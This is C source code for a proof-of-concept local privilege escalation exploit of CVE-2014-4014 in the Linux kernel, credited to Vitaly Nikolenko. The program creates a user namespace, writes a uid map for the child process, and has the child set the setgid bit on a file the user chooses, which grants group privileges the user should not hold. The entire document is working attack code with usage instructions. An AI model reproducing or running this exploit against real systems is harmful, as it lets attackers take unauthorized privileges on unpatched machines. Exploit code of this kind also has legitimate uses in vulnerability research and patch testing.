/**
* CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC
*
* Vitaly Nikolenko
* http://hashcrack.org
*
* Usage: ./poc [file_path]
*
* where file_path is the file on which you want to set the sgid bit
*/
#define _GNU_SOURCE
#include <sys/wait.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <limits.h>
#include <string.h>
#include <assert.h>
#define STACK_SIZE (1024 * 1024)
static
char
child_stack[STACK_SIZE];
struct
args {
int
pipe_fd[2];
char
*file_path;
};
static
int
child(
void
*arg) {
struct
args *f_args = (
struct
args *)arg;
char
c;
// close stdout
close(f_args->pipe_fd[1]);
assert
(read(f_args->pipe_fd[0], &c, 1) == 0);
// set the setgid bit
chmod(f_args->file_path, S_ISGID|S_IRUSR|S_IWUSR|S_IRGRP|S_IXGRP|S_IXUSR);
return
0;
}
int
main(
int
argc,
char
*argv[]) {
int
fd;
pid_t pid;
char
mapping[1024];
char
map_file[PATH_MAX];
struct
args f_args;
assert
(argc == 2);
f_args.file_path = argv[1];
// create a pipe for synching the child and parent
assert
(pipe(f_args.pipe_fd) != -1);
pid = clone(child, child_stack + STACK_SIZE, CLONE_NEWUSER | SIGCHLD, &f_args);
assert
(pid != -1);
// get the current uid outside the namespace
snprintf(mapping, 1024,
"0 %d 1\n"
, getuid());
// update uid and gid maps in the child
snprintf(map_file, PATH_MAX,
"/proc/%ld/uid_map"
, (
long
) pid);
fd = open(map_file, O_RDWR);
assert
(fd != -1);
assert
(write(fd, mapping,
strlen
(mapping)) ==
strlen
(mapping));
close(f_args.pipe_fd[1]);
assert
(waitpid(pid, NULL, 0) != -1);
}